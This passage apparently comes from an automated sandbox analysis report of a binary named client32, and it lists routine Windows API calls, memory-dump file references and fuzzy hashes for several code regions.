                                                                                                                          • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                        • std::exception::exception.LIBCMT ref: 11035277
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 1103528C
                                                                                                                        • std::exception::exception.LIBCMT ref: 1103529B
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 110352B0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throwstd::exception::exception$_memsetwsprintf
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 959338265-0
                                                                                                                        • Opcode ID: 58b7df8abda35fa66d394f383b262c333d8c95bf7682913761b522499381d223
                                                                                                                        • Instruction ID: 4202d9b2a3b9504ee52c3147c78dbba3f188beb93750ea11af99058fe090304e
                                                                                                                        • Opcode Fuzzy Hash: 58b7df8abda35fa66d394f383b262c333d8c95bf7682913761b522499381d223
                                                                                                                        • Instruction Fuzzy Hash: 14411BB5D00619AFCB10CF8AD880AAEFBF8FFA8604F10855FE555A7250E7716604CF91
                                                                                                                        APIs
                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 685CDFBA
                                                                                                                        • __isleadbyte_l.LIBCMT ref: 685CDFED
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?,?,?), ref: 685CE01E
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?,?,?), ref: 685CE08C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3058430110-0
                                                                                                                        • Opcode ID: dee4bc8008b509b8d4174f1fb5c210395060e9f1cf6e688c3d856b2bc7f8ff43
                                                                                                                        • Instruction ID: 8fb9a6d004f0e316e8fc07f73ac04319c500e60c012231e056d89a4b1b1a32ca
                                                                                                                        • Opcode Fuzzy Hash: dee4bc8008b509b8d4174f1fb5c210395060e9f1cf6e688c3d856b2bc7f8ff43
                                                                                                                        • Instruction Fuzzy Hash: 33319A31A44286EFDB10DFE8C885AAE7BB5BF02310F9185ADE4749B190D731D981DF92
                                                                                                                        APIs
                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 111750B9
                                                                                                                        • __isleadbyte_l.LIBCMT ref: 111750EC
                                                                                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,50036AD0,00BFBBEF,00000000,?,?,?,11175CE8,00000109,00BFBBEF,00000003), ref: 1117511D
                                                                                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,00000001,00BFBBEF,00000000,?,?,?,11175CE8,00000109,00BFBBEF,00000003), ref: 1117518B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3058430110-0
                                                                                                                        • Opcode ID: 045b0a910df906f647033cf6f86075e5ea6c3d6d2e1d9b3d8c151f3dfdd204cc
                                                                                                                        • Instruction ID: 460b63ceb136a055cb04312f44383bb8d9651ef64d988a6b12a47e6aec4ca511
                                                                                                                        • Opcode Fuzzy Hash: 045b0a910df906f647033cf6f86075e5ea6c3d6d2e1d9b3d8c151f3dfdd204cc
                                                                                                                        • Instruction Fuzzy Hash: 59310431A042C6EFDB42DF64CD80AAEBFB5FF01315F168569E4658B291E731DA80CB91
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 110CCA10: EnterCriticalSection.KERNEL32(00000000,00000000,7E4636A2,?,?,?,7E4636A2), ref: 110CCA4A
                                                                                                                          • Part of subcall function 110CCA10: LeaveCriticalSection.KERNEL32(00000000,?,?,?,7E4636A2), ref: 110CCAB2
                                                                                                                        • IsWindow.USER32(?), ref: 110CD2FB
                                                                                                                          • Part of subcall function 110CAFC0: GetCurrentThreadId.KERNEL32 ref: 110CAFC9
                                                                                                                        • RemovePropA.USER32(?), ref: 110CD328
                                                                                                                        • DeleteObject.GDI32(?), ref: 110CD33C
                                                                                                                        • DeleteObject.GDI32(?), ref: 110CD346
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalDeleteObjectSection$CurrentEnterLeavePropRemoveThreadWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3515130325-0
                                                                                                                        • Opcode ID: dfaa25823bd437af00b48b9cb039003f0fe96ea0139f721f484334f7840a211f
                                                                                                                        • Instruction ID: 1912d5f7d6517959c15795f1203ad34c6d2ee6b6a386a3d84c59d9fd341526e4
                                                                                                                        • Opcode Fuzzy Hash: dfaa25823bd437af00b48b9cb039003f0fe96ea0139f721f484334f7840a211f
                                                                                                                        • Instruction Fuzzy Hash: 57214BB5E007559BDB20DF69D844B5FFBE8AB44B18F004A6DE86297680D774E440CB90
                                                                                                                        APIs
                                                                                                                        • EnterCriticalSection.KERNEL32(685DB898,00000000,?,?,?,?,?,6859D68F), ref: 6859596C
                                                                                                                        • LeaveCriticalSection.KERNEL32(685DB898,?,?,?,?,?,6859D68F), ref: 6859597D
                                                                                                                        • SetEvent.KERNEL32(00000304,?,?,?,?,?,6859D68F), ref: 685959B7
                                                                                                                        • LeaveCriticalSection.KERNEL32(685DB898,?,?,?,?,?,6859D68F), ref: 685959CC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$Leave$EnterEvent
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3394196147-0
                                                                                                                        • Opcode ID: 20ccfea9f0aa10ced624ac50572de837c5f64a7a2195ce53b02efd576ebc9f95
                                                                                                                        • Instruction ID: a27c190c386f471bedda409248b0e438a294afb763294768ad4929a7779f8772
                                                                                                                        • Opcode Fuzzy Hash: 20ccfea9f0aa10ced624ac50572de837c5f64a7a2195ce53b02efd576ebc9f95
                                                                                                                        • Instruction Fuzzy Hash: 05219C71D01248AFDF00EF68C8047EEBBF6EB49315F91815AEC5AA7240E7315A44CB99
                                                                                                                        APIs
                                                                                                                        • timeGetTime.WINMM ref: 110590FC
                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 110591AA
                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 110591C4
                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 110591E9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$Leave$EnterTimetime
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1178526778-0
                                                                                                                        • Opcode ID: 5a3294d831c3680f41abea4f07c433e1b64d8288a9482612daab4534a2a8c4f2
                                                                                                                        • Instruction ID: de64faa2bc893f0042d2db027e64659f3d2cecc70f566eade1ffbf0f13490889
                                                                                                                        • Opcode Fuzzy Hash: 5a3294d831c3680f41abea4f07c433e1b64d8288a9482612daab4534a2a8c4f2
                                                                                                                        • Instruction Fuzzy Hash: 85216B75E006269FCB84DFA8C8C496EF7B8FF497047008A6DE926D7604E730E910CBA0
                                                                                                                        APIs
                                                                                                                        • Sleep.KERNEL32(000001F4,00000000,?), ref: 1103D0E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep
                                                                                                                        • String ID: /weblock.htm$:%u$redirect:http://127.0.0.1
                                                                                                                        • API String ID: 3472027048-2181447511
                                                                                                                        • Opcode ID: 73219fc91a885bec8c3d53282fd7fd25bd90ae77e27c8345a4b14af61fd7c86f
                                                                                                                        • Instruction ID: 53e0b3806bd00902e3668edf75962450fe0504f4029adcdddc47de674a55a881
                                                                                                                        • Opcode Fuzzy Hash: 73219fc91a885bec8c3d53282fd7fd25bd90ae77e27c8345a4b14af61fd7c86f
                                                                                                                        • Instruction Fuzzy Hash: 3D11B975F0112EEFFB11DBA4DC40FBEF7A99B41709F0141E9ED1997280DA616D0187A2
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 269201875-0
                                                                                                                        • Opcode ID: ec3c969e10003a4ab4fcd39709e582f3b98fac94c7fb781fbdef8f660fee8434
                                                                                                                        • Instruction ID: 924decae14a629f733ede0bb622a477ce8d6e199e6b7b916e29b3dd74e49d163
                                                                                                                        • Opcode Fuzzy Hash: ec3c969e10003a4ab4fcd39709e582f3b98fac94c7fb781fbdef8f660fee8434
                                                                                                                        • Instruction Fuzzy Hash: 1811573E404317AFCBD22FB09944A6DFB9A9B423F8B214425F9298A140EF71D840CB92
                                                                                                                        APIs
                                                                                                                        • GetCommandLineA.KERNEL32 ref: 00401024
                                                                                                                        • GetStartupInfoA.KERNEL32(?), ref: 00401079
                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,0000000A), ref: 0040109C
                                                                                                                        • ExitProcess.KERNEL32 ref: 004010A9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3638445121.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3638427287.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3638462516.0000000000403000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3638481461.0000000000404000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_400000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CommandExitHandleInfoLineModuleProcessStartup
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2164999147-0
                                                                                                                        • Opcode ID: 14085ec075f93681cd44e9da420e50c529999ece7765cc5c856b362def1b15a9
                                                                                                                        • Instruction ID: f614a552efd759633e5898ba04cf1d4763a2e92f88735b9f7b762142f34247ec
                                                                                                                        • Opcode Fuzzy Hash: 14085ec075f93681cd44e9da420e50c529999ece7765cc5c856b362def1b15a9
                                                                                                                        • Instruction Fuzzy Hash: BC1182201083C19AEB311F248A847AB6F959F03745F14047AE8D677AA6D27E88C7862D
                                                                                                                        APIs
                                                                                                                        • EnterCriticalSection.KERNEL32(685DB898,?,?,?,00000000), ref: 68597EB7
                                                                                                                        • LeaveCriticalSection.KERNEL32(685DB898,?,?,?,00000000), ref: 68597ED0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                        • String ID: RESULT$b
                                                                                                                        • API String ID: 3168844106-4141403093
                                                                                                                        • Opcode ID: 344ab9fa620dcd36a6245c9c9c2d44656570f2105c60666b4b785c9064d4d4c2
                                                                                                                        • Instruction ID: e36ac40c6bb355f4d0b958ebb63bcc38157700e48bf6b0e4c0bd3a5a7db64925
                                                                                                                        • Opcode Fuzzy Hash: 344ab9fa620dcd36a6245c9c9c2d44656570f2105c60666b4b785c9064d4d4c2
                                                                                                                        • Instruction Fuzzy Hash: E31125B5D01209AEDF11DFA4C8457AEBBF5FB48304F40406AD819E6240E7355A549BA6
                                                                                                                        APIs
                                                                                                                        • SystemParametersInfoA.USER32(00000029,00000154,?,00000000), ref: 111313B1
                                                                                                                        • CreateFontIndirectA.GDI32(?), ref: 111313CF
                                                                                                                        • CreateFontIndirectA.GDI32(?), ref: 111313E5
                                                                                                                        • CreateFontIndirectA.GDI32(FFFFFFF0), ref: 111313FB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFontIndirect$InfoParametersSystem
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3386289337-0
                                                                                                                        • Opcode ID: cddf9315703bad504045fd98c9e1cfe8d04d1f92840bc27388ccda177a2b43ee
                                                                                                                        • Instruction ID: e4efc710e3e979ce8ff1f48ebad8b7127cba25ea1afedff09802414c266bcb73
